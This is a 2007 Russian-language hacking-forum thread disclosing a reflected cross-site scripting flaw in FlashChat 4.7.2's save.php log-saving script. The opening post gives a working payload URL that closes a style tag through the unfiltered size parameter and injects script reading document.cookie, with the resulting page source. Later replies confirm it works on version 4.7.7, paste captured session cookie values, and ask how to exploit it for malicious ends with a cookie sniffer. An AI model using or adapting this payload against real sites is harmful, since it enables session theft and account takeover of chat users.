02.02.2007, 01:10
|
|
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
С нами:
10487223
Репутация:
490
|
|
FlashChat v 4.7.2
Пришлось мне потестить FlashChat v 4.7.2
Сам движок написан неплохо, все входящие символы в окно чата фильтруються.
В чате имееться скрипт, который позволяет сохранить логи. При нажатии по кнопке Save образуеться ссылка вида
save.php?id=895a28e67c9b1533b0c0786b7a0706ce&font=Arial&size=13
По переменным font и size можно догадаться что это шрифт, и его размер. Глянем сорс
Код:
<style type="text/css">
<!--
BODY {
font-family: Arial, Verdana, Arial, Helvetica, sans-serif;
font-size: 13px;
}
-->
</style>
Значения переменных не фильтруються, и можно вставить любой код, закрыв тег <style>.
Вот xss:
save.php?font=Arial&size=13px;}--></style><script>alert(document.cookie)</script><!--
Теперь иходный код примет такой вид
Код:
<style type="text/css">
<!--
BODY {
font-family: Arial, Verdana, Arial, Helvetica, sans-serif;
font-size: 13px;}--></style><script>alert(document.cookie)</script><!--
}
-->
</style>
А вот и куки =)
html комментарий после скрипта нужен чтобы убрать со страници ненужные символы которые остались в скрипте |
|
|
02.02.2007, 23:08
|
|
Новичок
Регистрация: 27.12.2006
Сообщений: 18
С нами:
10196240
Репутация:
19
|
|
Работает, шаришь).
|
|
|
|
03.02.2007, 00:59
|
|
Постоянный
Регистрация: 15.11.2006
Сообщений: 349
С нами:
10256006
Репутация:
1165
|
|
Как можно прикрыть ету уязвимость?И существует ли она в других версиях чата?
|
|
|
|
05.02.2007, 22:49
|
|
Новичок
Регистрация: 20.06.2006
Сообщений: 13
С нами:
10469062
Репутация:
8
|
|
попробовал на версии 4.7.7
wbb2_cookiehash=05774aa8eb7642934e9bd942be4ccb79;
wbb2_lastvisit=1170701252;
PHPSESSID=dc09253337597b4c7b65d61b7ad7d3f1
походу тож работает  |
|
|
|
10.02.2007, 19:43
|
|
Новичок
Регистрация: 16.06.2006
Сообщений: 21
С нами:
10474932
Репутация:
5
|
|
a kak panimat vot eta ?
Код:
357772|1082225=15931520|1; __utmz=125134932.1170512684.1.1.utmccn=(organic)|utmcsr=google|utmctr=taxi+4|utmcmd=organic; __utma=125134932.1436039616.1170512684.1170512684.1171122060.2; __utmc=125134932; __utmb=125134932
no chat nawerna ciutka perepisan |
|
|
|
13.02.2007, 00:57
|
|
Новичок
Регистрация: 22.01.2007
Сообщений: 18
С нами:
10158815
Репутация:
6
|
|
+1
Ну и начерта нам наши же кукисы?)
Как это можно юзать в злостных целях ?
Последний раз редактировалось Dimon_Aka_Sexxx; 13.02.2007 в 00:59..
|
|
|
|
02.03.2007, 13:54
|
|
Участник форума
Регистрация: 13.02.2007
Сообщений: 205
С нами:
10125863
Репутация:
55
|
|
Сообщение от Dimon_Aka_Sexxx
+1
Ну и начерта нам наши же кукисы?)
Как это можно юзать в злостных целях ?
Жжош! Некогда не юзал чтоли подобные уязвимости?
Кури ЭТО. 
|
|
|
|
02.03.2007, 17:55
|
|
Участник форума
Регистрация: 25.12.2006
Сообщений: 220
С нами:
10198406
Репутация:
243
|
|
я никогда не юзал такие уязвимости....ну получил свои куки......знающие и гуру разъясните пожалуйста, что дальше.
|
|
|
|
02.03.2007, 18:00
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
С нами:
10188326
Репутация:
1866
|
|
Сообщение от Витян
я никогда не юзал такие уязвимости....ну получил свои куки......знающие и гуру разъясните пожалуйста, что дальше.
Тебе же дали этот линк
дык читай... =\
|
|
|
|
08.04.2007, 10:53
|
|
Новичок
Регистрация: 04.04.2007
Сообщений: 4
С нами:
10054651
Репутация:
0
|
|
Лучше один раз увидеть, чем сто раз услышать... Можно ли записать видео с использованием этой уязвимости? желательно вместе с снифером. Или подробно на словах обьяснить, как пользоваться. Раньше с Xss не работал, максимум баловался метасплоитом в сетке.
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
FlashChat v4.7.0
|
ZikZak |
Болталка |
3 |
14.11.2006 05:34 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
